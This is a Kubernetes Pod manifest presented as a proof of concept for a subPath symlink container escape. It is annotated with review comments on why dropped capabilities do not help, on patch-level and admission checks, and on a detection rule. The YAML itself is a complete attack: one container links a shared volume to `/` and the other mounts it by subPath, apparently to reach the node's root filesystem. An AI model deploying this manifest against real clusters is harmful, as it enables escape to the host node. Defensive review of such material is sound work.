POC / exploit-pod-no-chroot.yaml YAML
---
# Proof-of-concept Pod manifest for a volume subPath symlink issue.
# Two containers share one emptyDir volume: `setup` plants a symlink named
# `host` that points at `/`, and `exploit` mounts that same volume with
# `subPath: host`.
# NOTE(review): the effect depends on how the node's kubelet resolves subPath;
# presumably a kubelet that follows the symlink on the host side would expose
# the node's root filesystem at /rootfs in `exploit`. Confirm against the
# advisory this PoC belongs to; the page does not name it.
# Defensive reading: every container below drops a long capability list and
# sets allowPrivilegeEscalation: false, so those settings should not be treated
# as a control for this class of issue. Review points are the kubelet patch
# level and admission policy on subPath use over volumes that another container
# in the pod can write to.
apiVersion: v1
kind: Pod
metadata:
  name: subpath
spec:
  containers:
  # Container 1 (`setup`): prepares the shared volume and signals completion.
  # nginx:latest with imagePullPolicy Always is a mutable tag re-pulled on every
  # start; the image content is not pinned by digest.
  - image: nginx:latest
    securityContext:
      allowPrivilegeEscalation: false
      capabilities:
         # `drop` is indented three spaces under `capabilities`; this parses, but
         # it is inconsistent with the two-space indent used elsewhere.
         # SYS_CHROOT is among the dropped capabilities, matching the
         # "no-chroot" in the file name.
         drop:
           - CHOWN
           - DAC_OVERRIDE
           - FOWNER
           - FSETID
           - KILL
           - SETGID
           - SETUID
           - SETPCAP
           - NET_BIND_SERVICE
           - NET_ADMIN
           - NET_RAW
           - SYS_CHROOT
           - MKNOD
           - AUDIT_WRITE
    name: setup
    imagePullPolicy: "Always"
    command: ["/bin/bash"]
    # Runs inside the shared volume: removes `hostetc`, creates the symlink
    # /rootfs/host -> /, writes the marker file /status/done, then idles.
    # The steps are chained with &&, so the marker is only written if the
    # symlink was created. The name removed (`hostetc`) differs from the link
    # name created (`host`).
    args: ["-c", "cd /rootfs && rm -rf hostetc && ln -s / /rootfs/host && touch /status/done && sleep infinity"]
    volumeMounts:
    - mountPath: /rootfs
      name: escape-volume
    - mountPath: /status
      name: status-volume
  # Container 2 (`exploit`): same image and securityContext as `setup`; the
  # only structural difference is the subPath on its escape-volume mount.
  - image: nginx:latest
    securityContext:
      allowPrivilegeEscalation: false
      capabilities:
         drop:
           - CHOWN
           - DAC_OVERRIDE
           - FOWNER
           - FSETID
           - KILL
           - SETGID
           - SETUID
           - SETPCAP
           - NET_BIND_SERVICE
           - NET_ADMIN
           - NET_RAW
           - SYS_CHROOT
           - MKNOD
           - AUDIT_WRITE
    name: exploit
    imagePullPolicy: "Always"
    command: ["/bin/bash"]
    # Idles forever once /status/done exists; otherwise sleeps one second and
    # exits. No restartPolicy is set in this manifest, so the retry presumably
    # relies on the cluster default restarting the container.
    args: ["-c", "if [[ -f /status/done ]];then sleep infinity; else sleep 1; fi"]
    volumeMounts:
    # subPath `host` names the entry that `setup` creates as a symlink to `/`.
    # Detection idea: flag pods where a subPath refers to a volume that another
    # container in the same pod mounts read-write.
    - mountPath: /rootfs
      name: escape-volume
      subPath: host
    - mountPath: /status
      name: status-volume
  volumes:
  # Both volumes are emptyDir; no hostPath volume is requested, so a policy
  # that only blocks hostPath does not match this manifest.
  - name: escape-volume
    emptyDir: {}
  - name: status-volume
    emptyDir: {}